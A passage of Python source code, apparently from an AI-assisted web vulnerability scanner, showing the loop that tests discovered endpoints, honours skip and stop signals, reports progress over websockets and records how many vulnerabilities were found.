tool_name="dynamic_vuln_engine",
tool_category="scanner"
)
except Exception as e:
await self._fail_agent_task(vuln_testing_task, str(e))
raise
try:
# Test endpoints with AI-determined vulnerabilities
total_endpoints = len(endpoints)
endpoints_tested = 0
vulns_before = scan.total_vulnerabilities
# Check for mid-phase skip signal
skip_now = self._should_skip_phase(scan_id, "testing")
if skip_now:
self._stop_requested = True
async with DynamicVulnerabilityEngine() as engine:
for i, endpoint in enumerate(endpoints):
if self._stop_requested:
break
# Check for skip signal during testing loop
skip_now = self._should_skip_phase(scan_id, "testing")
if skip_now:
await ws_manager.broadcast_log(scan_id, "warning", ">> Phase skip requested - finishing testing early")
break
progress = 45 + int((i / total_endpoints) * 45)
await ws_manager.broadcast_progress(
scan_id, progress,
f"Testing {i+1}/{total_endpoints}: {endpoint.path or endpoint.url[:50]}"
)
# Log what we're testing
await ws_manager.broadcast_log(scan_id, "debug", f"[{i+1}/{total_endpoints}] Testing: {endpoint.url[:80]}")
await self._test_endpoint_with_ai(
scan=scan,
endpoint=endpoint,
testing_plan=testing_plan,
engine=engine,
recon_data=recon_data
)
endpoints_tested += 1
# Update final counts
await self._update_vulnerability_counts(scan)
vulns_found = scan.total_vulnerabilities - vulns_before
await self._complete_agent_task(
vuln_testing_task,
items_processed=endpoints_tested,
items_found=vulns_found,
summary=f"Tested {endpoints_tested} endpoints, found {vulns_found} vulnerabilities"
)
except Exception as e:
await self._fail_agent_task(vuln_testing_task, str(e))
raise
# Phase 4: Complete
scan.status = "completed"